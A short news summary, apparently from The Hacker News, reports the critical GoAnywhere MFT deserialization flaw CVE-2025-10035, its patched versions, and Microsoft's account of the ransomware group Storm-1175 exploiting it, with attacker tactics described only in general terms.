"The vulnerability is CVE-2025-10035 (CVSS score: 10.0), a critical deserialization bug that could result in command injection without authentication. It was addressed in version 7.8.4, or the Sustain Release 7.6.3. "The vulnerability could allow a threat actor with a validly forged license response signature to deserialize an arbitrary actor-controlled object, possibly leading to command injection and potential remote code execution (RCE)," the Microsoft Threat Intelligence team said."
"According to the tech giant, Storm-1175 is a cybercriminal group known for deploying Medusa ransomware and exploiting public-facing applications for initial access since September 11, 2025. It's worth noting that watchTowr revealed last week that there were indications of active exploitation of the flaw since at least September 10. Furthermore, successful exploitation of CVE-2025-10035 could allow attackers to perform system and user discovery, maintain long-term access, and deploy additional tools for lateral movement and malware."
A critical deserialization bug, CVE-2025-10035 (CVSS 10.0), in Fortra GoAnywhere can lead to command injection and remote code execution without authentication and was fixed in versions 7.8.4 and Sustain Release 7.6.3. Storm-1175, a cybercriminal group deploying Medusa ransomware, exploited the flaw for initial access in September 2025. Exploitation enables system and user discovery, long-term access, and deployment of tools for lateral movement. Attackers drop RMM tools like SimpleHelp and MeshAgent, create .jsp files in GoAnywhere MFT directories, execute discovery commands, use mstsc.exe for lateral movement, establish C2 over Cloudflare tunnels, and exfiltrate data with tools such as Rclone.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]